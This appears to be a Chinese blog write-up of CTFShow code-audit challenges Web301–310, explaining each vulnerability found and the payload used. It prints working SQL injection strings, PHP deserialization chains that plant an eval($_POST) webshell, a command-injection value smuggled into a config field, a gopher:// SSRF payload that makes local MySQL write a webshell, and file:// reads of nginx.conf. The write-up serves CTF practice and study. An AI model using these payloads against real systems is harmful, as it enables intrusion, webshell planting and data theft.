CTFShow代码审计

CTFShow 代码审计

  • Web301
  • Web302
  • Web303
  • Web304
  • Web305
  • Web306
  • Web307
  • Web308
  • Web309
  • Web310


Web301

题目环境,用Seay自动审计了一下,啥也没找出来
CTFShow代码审计_第1张图片
自己来,找到一处SQL注入没有任何过滤
CTFShow代码审计_第2张图片
payload
userid=1' union select 1#&userpwd=1
CTFShow代码审计_第3张图片



Web302

新增一个过滤
在这里插入图片描述
CTFShow代码审计_第4张图片
本地试一下

function sds_decode($str){
    return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode('1');
//d9c77c4e454869d5d8da3b4be79694d3

payload
userid=1' union select 'd9c77c4e454869d5d8da3b4be79694d3'#&userpwd=1



Web303

Seay扫到注入点,这次直接admin\admin就可以登录了
在这里插入图片描述
可以新增,
CTFShow代码审计_第5张图片
payload
dpt_name=1',sds_address =(select database())#

dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#

dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name="sds_fl9g")#

dpt_name=1',sds_address =(select flag from sds_fl9g)#
在这里插入图片描述



Web304

新增全局WAF

function sds_waf($str){
	return preg_match('/[0-9]|[a-z]|-/i', $str);
}

额,用之前的方法也还是可以拿到flag

dpt_name=1',sds_address =(select flag from sds_flaag)#



Web305

Seay扫到存在写文件,还存在反序列化
CTFShow代码审计_第6张图片
CTFShow代码审计_第7张图片
构造序列化链,写一句话马

class user{
    public $username;
    public $password;
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __destruct(){
        file_put_contents($this->username, $this->password);
    }
}
echo urlencode(serialize(new user('1.php','')));
//O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D

蚁剑连上没找到flag,额,原来是在数据库里
CTFShow代码审计_第8张图片



Web306

login.php处的反序列化
CTFShow代码审计_第9张图片
CTFShow代码审计_第10张图片
CTFShow代码审计_第11张图片
构造链子,写一句话马

class dao{
    private $conn;

    public function __construct(){
        $this->conn=new log();
    }

    public function __destruct(){
        $this->conn->close();
    }
}
class log{
    public $title='1.php';
    public $info='';

    public function close(){
        file_put_contents($this->title, $this->info);
    }

}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4iO319


Web307

在这里插入图片描述
CTFShow代码审计_第12张图片
CTFShow代码审计_第13张图片
CTFShow代码审计_第14张图片
很明显了,只需要利用这个就可以写马了 $this->config->cache_dir

class config{
	public $cache_dir = ';echo "" >1.php;';
}
class dao{
	private $config;
	public function __construct(){
		$this->config=new config();
	}
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NDE6IjtlY2hvICI8P3BocCBldmFsKFwkX1BPU1RbMV0pPz4iID4gMS5waHA7Ijt9fQ==


Web308

还是从login.php这里的反序列化开始找链子
在这里插入图片描述
CTFShow代码审计_第15张图片
在这里插入图片描述
CTFShow代码审计_第16张图片
CTFShow代码审计_第17张图片
很显然就是要去利用$update_url带到checkUpdate去打SSRF,MySQL没密码
CTFShow代码审计_第18张图片

class config{
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%33%36%30%5d%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxODoiAGNvbmZpZwB1cGRhdGVfdXJsIjtzOjc2MzoiZ29waGVyOi8vMTI3LjAuMC4xOjMzMDYvXyVhMyUwMCUwMCUwMSU4NSVhNiVmZiUwMSUwMCUwMCUwMCUwMSUyMSUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCU3MiU2ZiU2ZiU3NCUwMCUwMCU2ZCU3OSU3MyU3MSU2YyU1ZiU2ZSU2MSU3NCU2OSU3NiU2NSU1ZiU3MCU2MSU3MyU3MyU3NyU2ZiU3MiU2NCUwMCU2NiUwMyU1ZiU2ZiU3MyUwNSU0YyU2OSU2ZSU3NSU3OCUwYyU1ZiU2MyU2YyU2OSU2NSU2ZSU3NCU1ZiU2ZSU2MSU2ZCU2NSUwOCU2YyU2OSU2MiU2ZCU3OSU3MyU3MSU2YyUwNCU1ZiU3MCU2OSU2NCUwNSUzMiUzNyUzMiUzNSUzNSUwZiU1ZiU2MyU2YyU2OSU2NSU2ZSU3NCU1ZiU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUwNiUzNSUyZSUzNyUyZSUzMiUzMiUwOSU1ZiU3MCU2YyU2MSU3NCU2NiU2ZiU3MiU2ZCUwNiU3OCUzOCUzNiU1ZiUzNiUzNCUwYyU3MCU3MiU2ZiU2NyU3MiU2MSU2ZCU1ZiU2ZSU2MSU2ZCU2NSUwNSU2ZCU3OSU3MyU3MSU2YyU0NiUwMCUwMCUwMCUwMyU3MyU2NSU2YyU2NSU2MyU3NCUyMCUyNyUzYyUzZiU3MCU2OCU3MCUyMCU2NSU3NiU2MSU2YyUyOCUyNCU1ZiU1MCU0ZiU1MyU1NCU1YiUzMyUzNiUzMCU1ZCUyOSUzZiUzZSUyNyUyMCU2OSU2ZSU3NCU2ZiUyMCU2ZiU3NSU3NCU2NiU2OSU2YyU2NSUyMCUyNyUyZiU3NiU2MSU3MiUyZiU3NyU3NyU3NyUyZiU2OCU3NCU2ZCU2YyUyZiUzMSUyZSU3MCU2OCU3MCUyNyUwMSUwMCUwMCUwMCUwMSI7fX0=


Web309

这次MySQL有密码,猜测不是redis就是fastcgi了,一样的
CTFShow代码审计_第19张图片



Web310

这次如果还是按照上一题的方法打fastcgi传一句话马会发现可以传成功,但是用蚁剑去连读不到flag,很奇怪不知道为什么

看了眼大佬的方法,是去读nginx.conf,这个配置文件

class config{
    public $update_url ="file:///etc/nginx/nginx.conf";
}
class dao{
    private $config;

    public function __construct(){
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyODoiZmlsZTovLy9ldGMvbmdpbngvbmdpbnguY29uZiI7fX0=

CTFShow代码审计_第20张图片
找到了flag位置,就去读4476端口

class config{
    public $update_url ="http://127.0.0.1:4476/";
}
class dao{
    private $config;

    public function __construct(){
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyMjoiaHR0cDovLzEyNy4wLjAuMTo0NDc2LyI7fX0=

CTFShow代码审计_第21张图片

你可能感兴趣的:(CTFShow刷题篇,web安全)